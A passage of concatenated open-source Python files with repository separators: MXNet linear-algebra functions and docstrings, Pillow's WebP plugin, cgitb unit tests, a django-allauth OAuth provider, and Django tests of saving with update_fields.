#return _npi.norm(x, ord=-float('inf'), axis=axis, keepdims=keepdims, flag=4)
elif ord is None:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
elif ord == 2:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=-1)
elif ord == 'nuc':
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=2)
elif ord in ['fro', 'f']:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
else:
return _npi.norm(x, ord=ord, axis=axis, keepdims=keepdims, flag=-1)
else:
raise TypeError("'axis' must be None, an integer or a tuple of integers.")
# pylint: enable=too-many-return-statements
def svd(a):
r"""
Singular Value Decomposition.
When `a` is a 2D array, it is factorized as ``ut @ np.diag(s) @ v``,
where `ut` and `v` are 2D orthonormal arrays and `s` is a 1D
array of `a`'s singular values. When `a` is higher-dimensional, SVD is
applied in stacked mode as explained below.
Parameters
----------
a : (..., M, N) _Symbol
A real array with ``a.ndim >= 2`` and ``M <= N``.
Returns
-------
ut: (..., M, M) _Symbol
Orthonormal array(s). The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
s : (..., M) _Symbol
Vector(s) with the singular values, within each vector sorted in
descending order. The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
v : (..., M, N) _Symbol
Orthonormal array(s). The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
Notes
-----
The decomposition is performed using LAPACK routine ``_gesvd``.
SVD is usually described for the factorization of a 2D matrix :math:`A`.
The higher-dimensional case will be discussed below. In the 2D case, SVD is
written as :math:`A = U^T S V`, where :math:`A = a`, :math:`U^T = ut`,
:math:`S= \mathtt{np.diag}(s)` and :math:`V = v`. The 1D array `s`
contains the singular values of `a` and `ut` and `v` are orthonormal. The rows
of `v` are the eigenvectors of :math:`A^T A` and the columns of `ut` are
the eigenvectors of :math:`A A^T`. In both cases the corresponding
(possibly non-zero) eigenvalues are given by ``s**2``.
The sign of rows of `u` and `v` are determined as described in
`Auto-Differentiating Linear Algebra <https://arxiv.org/pdf/1710.08717.pdf>`_.
If `a` has more than two dimensions, then broadcasting rules apply.
This means that SVD is working in "stacked" mode: it iterates over
all indices of the first ``a.ndim - 2`` dimensions and for each
combination SVD is applied to the last two indices. The matrix `a`
can be reconstructed from the decomposition with either
``(ut * s[..., None, :]) @ v`` or
``ut @ (s[..., None] * v)``. (The ``@`` operator denotes batch matrix multiplication)
This function differs from the original `numpy.linalg.svd
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.svd.html>`_ in
the following way(s):
- The sign of rows of `u` and `v` may differ.
- Does not support complex input.
"""
return _npi.svd(a)
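# Illustrative sketch (not in the original file) of the reconstruction
# identity stated in the notes above, via the ndarray front end:
#
#   from mxnet import np
#   a = np.random.uniform(-1., 1., (2, 3))   # requires M <= N
#   ut, s, v = np.linalg.svd(a)
#   (ut @ (s[..., None] * v) - a).sum()      # ~0 up to rounding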
def cholesky(a):
r"""
Cholesky decomposition.
Return the Cholesky decomposition, `L * L.T`, of the square matrix `a`,
where `L` is lower-triangular and .T is the transpose operator. `a` must be
symmetric and positive-definite. Only `L` is actually returned. Complex-valued
input is currently not supported.
Parameters
----------
a : (..., M, M) ndarray
Symmetric, positive-definite input matrix.
Returns
-------
L : (..., M, M) ndarray
Lower-triangular Cholesky factor of `a`.
Raises
------
MXNetError
If the decomposition fails, for example, if `a` is not positive-definite.
Notes
-----
Broadcasting rules apply.
The Cholesky decomposition is often used as a fast way of solving
.. math:: A \mathbf{x} = \mathbf{b}
(when `A` is both symmetric and positive-definite).
First, we solve for :math:`\mathbf{y}` in
.. math:: L \mathbf{y} = \mathbf{b},
and then for :math:`\mathbf{x}` in
.. math:: L.T \mathbf{x} = \mathbf{y}.
Examples
--------
>>> A = np.array([[16, 4], [4, 10]])
>>> A
array([[16., 4.],
[ 4., 10.]])
>>> L = np.linalg.cholesky(A)
>>> L
array([[4., 0.],
[1., 3.]])
>>> np.dot(L, L.T)
array([[16., 4.],
[ 4., 10.]])
"""
return _npi.cholesky(a, True)
def qr(a, mode='reduced'):
r"""
Compute the qr factorization of a matrix a.
Factor the matrix a as qr, where q is orthonormal and r is upper-triangular.
Parameters
----------
a : (..., M, N) _Symbol
Matrix or stack of matrices to be qr factored.
mode : {'reduced', 'complete', 'r', 'raw', 'full', 'economic'}, optional
Only default mode, 'reduced', is implemented. If K = min(M, N), then
* 'reduced' : returns q, r with dimensions (M, K), (K, N) (default)
Returns
-------
q : (..., M, K) _Symbol
A matrix or stack of matrices with K orthonormal columns, with K = min(M, N).
r : (..., K, N) _Symbol
A matrix or stack of upper triangular matrices.
Raises
------
MXNetError
If factoring fails.
Examples
--------
>>> from mxnet import np
>>> a = np.random.uniform(-10, 10, (2, 2))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.22121978, -0.97522414],
[-0.97522414, 0.22121954]])
>>> r
array([[-4.4131265 , -7.1255064 ],
[ 0. , -0.28771925]])
>>> a = np.random.uniform(-10, 10, (2, 3))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.28376842, -0.9588929 ],
[-0.9588929 , 0.28376836]])
>>> r
array([[-7.242763 , -0.5673361 , -2.624416 ],
[ 0. , -7.297918 , -0.15949416]])
>>> a = np.random.uniform(-10, 10, (3, 2))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.34515655, 0.10919492],
[ 0.14765628, -0.97452265],
[-0.92685735, -0.19591334]])
>>> r
array([[-8.453794, 8.4175 ],
[ 0. , 5.430561]])
"""
if mode is not None and mode != 'reduced':
raise NotImplementedError("Only default mode='reduced' is implemented.")
return _npi.qr(a)
def inv(a):
r"""
Compute the (multiplicative) inverse of a matrix.
Given a square matrix `a`, return the matrix `ainv` satisfying
``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.
Parameters
----------
a : (..., M, M) ndarray
Matrix to be inverted.
Returns
-------
ainv : (..., M, M) ndarray
(Multiplicative) inverse of the matrix `a`.
Raises
------
MXNetError
If `a` is not square or inversion fails.
Examples
--------
>>> from mxnet import np
>>> a = np.array([[1., 2.], [3., 4.]])
array([[-2. , 1. ],
[ 1.5, -0.5]])
Inverses of several matrices can be computed at once:
>>> a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
>>> np.linalg.inv(a)
array([[[-2. , 1. ],
[ 1.5 , -0.5 ]],
[[-1.2500001 , 0.75000006],
[ 0.75000006, -0.25000003]]])
"""
return _npi.inv(a)
def det(a):
r"""
Compute the determinant of an array.
Parameters
----------
a : (..., M, M) ndarray
Input array to compute determinants for.
Returns
-------
det : (...) ndarray
Determinant of `a`.
See Also
--------
slogdet : Another way to represent the determinant, more suitable
for large matrices where underflow/overflow may occur.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:
>>> a = np.array([[1, 2], [3, 4]])
>>> np.linalg.det(a)
-2.0
Computing determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> np.linalg.det(a)
array([-2., -3., -8.])
"""
return _npi.det(a)
def slogdet(a):
r"""
Compute the sign and (natural) logarithm of the determinant of an array.
If an array has a very small or very large determinant, then a call to
`det` may overflow or underflow. This routine is more robust against such
issues, because it computes the logarithm of the determinant rather than
the determinant itself.
Parameters
----------
a : (..., M, M) ndarray
Input array, has to be a square 2-D array.
Returns
-------
sign : (...) ndarray
A number representing the sign of the determinant. For a real matrix,
this is 1, 0, or -1.
logdet : (...) array_like
The natural log of the absolute value of the determinant.
If the determinant is zero, then `sign` will be 0 and `logdet` will be
-Inf. In all cases, the determinant is equal to ``sign * np.exp(logdet)``.
See Also
--------
det
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array ``[[a, b], [c, d]]`` is ``ad - bc``:
>>> a = np.array([[1, 2], [3, 4]])
>>> (sign, logdet) = np.linalg.slogdet(a)
>>> (sign, logdet)
(-1., 0.69314718055994529)
>>> sign * np.exp(logdet)
-2.0
Computing log-determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> sign, logdet = np.linalg.slogdet(a)
>>> (sign, logdet)
(array([-1., -1., -1.]), array([ 0.69314718, 1.09861229, 2.07944154]))
>>> sign * np.exp(logdet)
array([-2., -3., -8.])
This routine succeeds where ordinary `det` does not:
>>> np.linalg.det(np.eye(500) * 0.1)
0.0
>>> np.linalg.slogdet(np.eye(500) * 0.1)
(1., -1151.2925464970228)
"""
return _npi.slogdet(a)
def solve(a, b):
r"""
Solve a linear matrix equation, or system of linear scalar equations.
Computes the "exact" solution, `x`, of the well-determined, i.e., full
rank, linear matrix equation `ax = b`.
Parameters
----------
a : (..., M, M) ndarray
Coefficient matrix.
b : {(..., M,), (..., M, K)}, ndarray
Ordinate or "dependent variable" values.
Returns
-------
x : {(..., M,), (..., M, K)} ndarray
Solution to the system a x = b. Returned shape is identical to `b`.
Raises
------
MXNetError
If `a` is singular or not square.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The solutions are computed using LAPACK routine ``_gesv``.
`a` must be square and of full-rank, i.e., all rows (or, equivalently,
columns) must be linearly independent; if either is not true, use
`lstsq` for the least-squares best "solution" of the
system/equation.
Examples
--------
Solve the system of equations ``3 * x0 + x1 = 9`` and ``x0 + 2 * x1 = 8``:
>>> a = np.array([[3,1], [1,2]])
>>> b = np.array([9,8])
>>> x = np.linalg.solve(a, b)
>>> x
array([2., 3.])
Check that the solution is correct:
>>> np.allclose(np.dot(a, x), b)
True
"""
return _npi.solve(a, b)
def tensorinv(a, ind=2):
r"""
Compute the 'inverse' of an N-dimensional array.
The result is an inverse for `a` relative to the tensordot operation
``tensordot(a, b, ind)``, i. e., up to floating-point accuracy,
``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor for the
tensordot operation.
Parameters
----------
a : array_like
Tensor to 'invert'. Its shape must be 'square', i. e.,
``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
ind : int, optional
Number of first indices that are involved in the inverse sum.
Must be a positive integer, default is 2.
Returns
-------
b : ndarray
`a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.
Raises
------
MXNetError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
tensordot, tensorsolve
Examples
--------
>>> a = np.eye(4*6)
>>> a.shape = (4, 6, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=2)
>>> ainv.shape
(8, 3, 4, 6)
>>> b = np.random.randn(4, 6)
>>> np.allclose(np.tensordot(ainv, b), np.linalg.tensorsolve(a, b))
True
>>> a = np.eye(4*6)
>>> a.shape = (24, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=1)
>>> ainv.shape
(8, 3, 24)
>>> b = np.random.randn(24)
>>> np.allclose(np.tensordot(ainv, b, 1), np.linalg.tensorsolve(a, b))
True
"""
return _npi.tensorinv(a, ind)
def tensorsolve(a, b, axes=None):
r"""
Solve the tensor equation ``a x = b`` for x.
It is assumed that all indices of `x` are summed over in the product,
together with the rightmost indices of `a`, as is done in, for example,
``tensordot(a, x, axes=b.ndim)``.
Parameters
----------
a : ndarray
Coefficient tensor, of shape ``b.shape + Q``. `Q`, a tuple, equals
the shape of that sub-tensor of `a` consisting of the appropriate
number of its rightmost indices, and must be such that
``prod(Q) == prod(b.shape)`` (in which sense `a` is said to be
'square').
b : ndarray
Right-hand tensor, which can be of any shape.
axes : tuple of ints, optional
Axes in `a` to reorder to the right, before inversion.
If None (default), no reordering is done.
Returns
-------
x : ndarray, shape Q
Raises
------
MXNetError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorinv, numpy.einsum
Examples
--------
>>> a = np.eye(2*3*4)
>>> a.shape = (2*3, 4, 2, 3, 4)
>>> b = np.random.randn(2*3, 4)
>>> x = np.linalg.tensorsolve(a, b)
>>> x.shape
(2, 3, 4)
>>> np.allclose(np.tensordot(a, x, axes=3), b)
True
"""
return _npi.tensorsolve(a, b, axes)
def eigvals(a):
r"""
Compute the eigenvalues of a general matrix.
Main difference between `eigvals` and `eig`: the eigenvectors aren't
returned.
Parameters
----------
a : (..., M, M) ndarray
A real-valued matrix whose eigenvalues will be computed.
Returns
-------
w : (..., M,) ndarray
The eigenvalues, each repeated according to its multiplicity.
They are not necessarily ordered.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigh : eigenvalues and eigenvectors of a real symmetric array.
eigvalsh : eigenvalues of a real symmetric array.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the ``_geev`` LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
This function differs from the original `numpy.linalg.eigvals
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigvals.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigvals(a)
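# Illustrative sketch (not in the original file; ndarray front end assumed):
#
#   from mxnet import np
#   w = np.linalg.eigvals(np.array([[2., 0.], [0., 3.]]))
#   # w holds 2. and 3. (the ordering is not guaranteed, per the docstring)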
def eigvalsh(a, UPLO='L'):
r"""
Compute the eigenvalues of a real symmetric matrix.
Main difference from eigh: the eigenvectors are not computed.
Parameters
----------
a : (..., M, M) ndarray
A real-valued matrix whose eigenvalues are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M,) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a real symmetric array.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues are computed using LAPACK routines ``_syevd``.
This function differs from the original `numpy.linalg.eigvalsh
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigvalsh.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigvalsh(a, UPLO)
def eig(a):
r"""
Compute the eigenvalues and right eigenvectors of a square array.
Parameters
----------
a : (..., M, M) ndarray
Matrices for which the eigenvalues and right eigenvectors will
be computed
Returns
-------
w : (..., M) ndarray
The eigenvalues, each repeated according to its multiplicity.
The eigenvalues are not necessarily ordered.
v : (..., M, M) ndarray
The normalized (unit "length") eigenvectors, such that the
column ``v[:,i]`` is the eigenvector corresponding to the
eigenvalue ``w[i]``.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a real symmetric array.
eigvalsh : eigenvalues of a real symmetric array.
Notes
-----
This is implemented using the ``_geev`` LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
The number `w` is an eigenvalue of `a` if there exists a vector
`v` such that ``dot(a,v) = w * v``. Thus, the arrays `a`, `w`, and
`v` satisfy the equations ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``
for :math:`i \in \{0,...,M-1\}`.
The array `v` of eigenvectors may not be of maximum rank, that is, some
of the columns may be linearly dependent, although round-off error may
obscure that fact. If the eigenvalues are all different, then theoretically
the eigenvectors are linearly independent.
This function differs from the original `numpy.linalg.eig
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eig.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eig(a)
def eigh(a, UPLO='L'):
r"""
Return the eigenvalues and eigenvectors of a real symmetric matrix.
Returns two objects, a 1-D array containing the eigenvalues of `a`, and
a 2-D square array or matrix (depending on the input type) of the
corresponding eigenvectors (in columns).
Parameters
----------
a : (..., M, M) ndarray
Real symmetric matrices whose eigenvalues and eigenvectors are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
v : {(..., M, M) ndarray, (..., M, M) matrix}
The column ``v[:, i]`` is the normalized eigenvector corresponding
to the eigenvalue ``w[i]``. Will return a matrix object if `a` is
a matrix object.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvals : eigenvalues of a non-symmetric array.
eigvalsh : eigenvalues of a real symmetric array.
Notes
-----
The eigenvalues/eigenvectors are computed using LAPACK routines ``_syevd``.
This function differs from the original `numpy.linalg.eigh
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigh.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigh(a, UPLO)
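# Illustrative sketch (not in the original file; ndarray front end assumed):
#
#   from mxnet import np
#   w, v = np.linalg.eigh(np.array([[2., 1.], [1., 2.]]))
#   # w is ascending, here approximately [1., 3.]; the columns of v are the
#   # corresponding unit eigenvectors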
| apache-2.0 |
SurfasJones/icecream-info | icecream/lib/python2.7/site-packages/PIL/WebPImagePlugin.py | 8 | 1946 | from PIL import Image
from PIL import ImageFile
from io import BytesIO
from PIL import _webp
_VALID_WEBP_MODES = {
"RGB": True,
"RGBA": True,
}
_VP8_MODES_BY_IDENTIFIER = {
b"VP8 ": "RGB",
b"VP8X": "RGBA",
b"VP8L": "RGBA", # lossless
}
def _accept(prefix):
is_riff_file_format = prefix[:4] == b"RIFF"
is_webp_file = prefix[8:12] == b"WEBP"
is_valid_vp8_mode = prefix[12:16] in _VP8_MODES_BY_IDENTIFIER
return is_riff_file_format and is_webp_file and is_valid_vp8_mode
class WebPImageFile(ImageFile.ImageFile):
format = "WEBP"
format_description = "WebP image"
def _open(self):
data, width, height, self.mode, icc_profile, exif = _webp.WebPDecode(self.fp.read())
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
self.size = width, height
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.mode)]
def _getexif(self):
from PIL.JpegImagePlugin import _getexif
return _getexif(self)
def _save(im, fp, filename):
image_mode = im.mode
if im.mode not in _VALID_WEBP_MODES:
raise IOError("cannot write mode %s as WEBP" % image_mode)
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
icc_profile = im.encoderinfo.get("icc_profile", "")
exif = im.encoderinfo.get("exif", "")
data = _webp.WebPEncode(
im.tobytes(),
im.size[0],
im.size[1],
lossless,
float(quality),
im.mode,
icc_profile,
exif
)
if data is None:
raise IOError("cannot write file as WEBP (encoder returned None)")
fp.write(data)
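# Illustrative usage sketch (not part of the original plugin; assumes a Pillow
# build with WebP support, and the file names are placeholders):
#
#   from PIL import Image
#   im = Image.open("in.png").convert("RGB")
#   im.save("out.webp", "WEBP", quality=80, lossless=False)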
Image.register_open("WEBP", WebPImageFile, _accept)
Image.register_save("WEBP", _save)
Image.register_extension("WEBP", ".webp")
Image.register_mime("WEBP", "image/webp")
| mit |
kikocorreoso/brython | www/src/Lib/test/test_cgitb.py | 5 | 2565 | from test.support import temp_dir
from test.support.script_helper import assert_python_failure
import unittest
import sys
import cgitb
class TestCgitb(unittest.TestCase):
def test_fonts(self):
text = "Hello Robbie!"
self.assertEqual(cgitb.small(text), "<small>{}</small>".format(text))
self.assertEqual(cgitb.strong(text), "<strong>{}</strong>".format(text))
self.assertEqual(cgitb.grey(text),
'<font color="#909090">{}</font>'.format(text))
def test_blanks(self):
self.assertEqual(cgitb.small(""), "")
self.assertEqual(cgitb.strong(""), "")
self.assertEqual(cgitb.grey(""), "")
def test_html(self):
try:
raise ValueError("Hello World")
except ValueError as err:
# If the html was templated we could do a bit more here.
# At least check that we get details on what we just raised.
html = cgitb.html(sys.exc_info())
self.assertIn("ValueError", html)
self.assertIn(str(err), html)
def test_text(self):
try:
raise ValueError("Hello World")
except ValueError as err:
text = cgitb.text(sys.exc_info())
self.assertIn("ValueError", text)
self.assertIn("Hello World", text)
def test_syshook_no_logdir_default_format(self):
with temp_dir() as tracedir:
rc, out, err = assert_python_failure(
'-c',
('import cgitb; cgitb.enable(logdir=%s); '
'raise ValueError("Hello World")') % repr(tracedir))
out = out.decode(sys.getfilesystemencoding())
self.assertIn("ValueError", out)
self.assertIn("Hello World", out)
self.assertIn("<strong><module></strong>", out)
# By default we emit HTML markup.
self.assertIn('<p>', out)
self.assertIn('</p>', out)
def test_syshook_no_logdir_text_format(self):
# Issue 12890: we were emitting the <p> tag in text mode.
with temp_dir() as tracedir:
rc, out, err = assert_python_failure(
'-c',
('import cgitb; cgitb.enable(format="text", logdir=%s); '
'raise ValueError("Hello World")') % repr(tracedir))
out = out.decode(sys.getfilesystemencoding())
self.assertIn("ValueError", out)
self.assertIn("Hello World", out)
self.assertNotIn('<p>', out)
self.assertNotIn('</p>', out)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
ZachLiuGIS/django-allauth | allauth/socialaccount/providers/odnoklassniki/provider.py | 64 | 1383 | from allauth.socialaccount import providers
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class OdnoklassnikiAccount(ProviderAccount):
def get_profile_url(self):
return self.account.extra_data.get('link')
def get_avatar_url(self):
ret = None
pic_big_url = self.account.extra_data.get('pic1024x768')
pic_medium_url = self.account.extra_data.get('pic640x480')
pic_small_url = self.account.extra_data.get('pic190x190')
if pic_big_url:
return pic_big_url
elif pic_medium_url:
return pic_medium_url
elif pic_small_url:
return pic_small_url
else:
return ret
def to_str(self):
dflt = super(OdnoklassnikiAccount, self).to_str()
return self.account.extra_data.get('name', dflt)
class OdnoklassnikiProvider(OAuth2Provider):
id = 'odnoklassniki'
name = 'Odnoklassniki'
package = 'allauth.socialaccount.providers.odnoklassniki'
account_class = OdnoklassnikiAccount
def extract_uid(self, data):
return data['uid']
def extract_common_fields(self, data):
return dict(last_name=data.get('last_name'),
first_name=data.get('first_name'))
providers.registry.register(OdnoklassnikiProvider)
| mit |
RichardLitt/wyrd-django-dev | tests/modeltests/update_only_fields/tests.py | 7 | 9587 | from __future__ import absolute_import
from django.db.models.signals import pre_save, post_save
from django.test import TestCase
from .models import Person, Employee, ProxyEmployee, Profile, Account
class UpdateOnlyFieldsTests(TestCase):
def test_update_fields_basic(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s.gender = 'M'
s.name = 'Ian'
s.save(update_fields=['name'])
s = Person.objects.get(pk=s.pk)
self.assertEqual(s.gender, 'F')
self.assertEqual(s.name, 'Ian')
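# Note (illustrative, not part of the original tests): save(update_fields=[...])
# issues a single UPDATE touching only the listed columns, roughly
#   UPDATE update_only_fields_person SET name = 'Ian' WHERE id = ...;
# which is why the in-memory change to `gender` above is not persisted.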
def test_update_fields_deferred(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.defer("gender", "pid").get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_1(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_2(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(2):
s1.save(update_fields=['pid'])
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Sara")
self.assertEqual(s2.gender, "F")
def test_update_fields_only_repeated(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.gender = 'M'
with self.assertNumQueries(1):
s1.save()
# Test that the deferred class does not remember that gender was
# set; instead the instance should remember this.
s1 = Person.objects.only('name').get(pk=s.pk)
with self.assertNumQueries(1):
s1.save()
def test_update_fields_inheritance_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('name').get(pk=e1.pk)
e1.name = 'Linda'
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).name,
'Linda')
def test_update_fields_fk_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile').get(pk=e1.pk)
e1.profile = profile_receptionist
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_receptionist)
e1.profile_id = profile_boss.pk
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_boss)
def test_select_related_only_interaction(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile__salary').select_related('profile').get(pk=e1.pk)
profile_boss.name = 'Clerk'
profile_boss.salary = 1000
profile_boss.save()
# The loaded salary of 3000 gets saved, the name of 'Clerk' isn't
# overwritten.
with self.assertNumQueries(1):
e1.profile.save()
reloaded_profile = Profile.objects.get(pk=profile_boss.pk)
self.assertEqual(reloaded_profile.name, profile_boss.name)
self.assertEqual(reloaded_profile.salary, 3000)
def test_update_fields_m2m(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
a1 = Account.objects.create(num=1)
a2 = Account.objects.create(num=2)
e1.accounts = [a1,a2]
with self.assertRaises(ValueError):
e1.save(update_fields=['accounts'])
def test_update_fields_inheritance(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
with self.assertNumQueries(1):
e3.profile = profile_boss
e3.save(update_fields=['profile_id'])
e4 = Employee.objects.get(pk=e3.pk)
self.assertEqual(e4.profile, profile_boss)
self.assertEqual(e4.profile_id, profile_boss.pk)
def test_update_fields_inheritance_with_proxy_model(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = ProxyEmployee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
def test_update_fields_signals(self):
p = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
p.save(update_fields=['name'])
self.assertEqual(len(pre_save_data), 1)
self.assertEqual(len(pre_save_data[0]), 1)
self.assertTrue('name' in pre_save_data[0])
self.assertEqual(len(post_save_data), 1)
self.assertEqual(len(post_save_data[0]), 1)
self.assertTrue('name' in post_save_data[0])
def test_update_fields_incorrect_params(self):
s = Person.objects.create(name='Sara', gender='F')
with self.assertRaises(ValueError):
s.save(update_fields=['first_name'])
with self.assertRaises(ValueError):
s.save(update_fields="name")
def test_empty_update_fields(self):
s = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
# Save is skipped.
with self.assertNumQueries(0):
s.save(update_fields=[])
# Signals were skipped, too...
self.assertEqual(len(pre_save_data), 0)
